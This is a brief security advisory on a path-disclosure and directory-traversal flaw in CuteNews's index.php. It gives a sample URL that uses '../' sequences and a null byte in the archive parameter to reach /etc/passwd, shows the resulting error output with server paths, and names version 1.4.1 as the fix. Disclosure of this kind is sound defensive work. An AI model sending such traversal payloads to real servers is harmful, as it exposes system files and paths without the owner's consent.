A remote user can supply a specially crafted URL to cause the system to display an error message that discloses the installation path and other data. Bug exists in "index.php". Example: http://victim.com/index.php?subaction=showfull &id=1128227686&archive=../../../../../../etc/passwd%00&start_from=&ucat=1& Error: Warning: file(/storage/bg/myst/www/irc/cutenews/data/archives/../../../../../../../../../etc/passwd\0.news.arch): failed to open stream: No such file or directory in /storage/bg/myst/www/irc/cutenews/inc/shows.inc.php on line 268 Warning: Invalid argument supplied for foreach() in /storage/bg/myst/www/irc/cutenews/inc/shows.inc.php on line 270 Can not find an article with id: 1128227686 ------------------------------------------------------------------- Solution: Upgrade version 1.4.1 ------------------------------------------- Original advisory: http://www.securityinfo.ru/2005/11/____cutenews_140.html **************************** http://www.securityinfo.ru
